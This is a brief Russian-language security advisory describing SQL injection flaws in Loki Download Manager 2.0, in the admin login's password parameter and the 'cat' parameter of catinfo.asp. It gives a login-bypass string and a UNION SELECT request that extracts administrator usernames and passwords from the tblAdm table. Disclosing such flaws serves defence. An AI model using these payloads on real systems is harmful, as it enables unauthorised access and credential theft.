Программа: Loki Download Manager 2.0 

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения.
Уязвимость существует в сценарии ‘/adm/default.asp’ при обработке параметра password и в сценарии ‘catinfo.asp’ в параметре ‘cat’. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения. 

Пример:

user: anyuser
pass: ‘or»=’

http://[target]/downmancv/catinfo.asp?cat=’ union select  null,null,user,null,null,null,null,null,pass,null,
null,null,null,null FROM  tblAdm ‘



Оставить мнение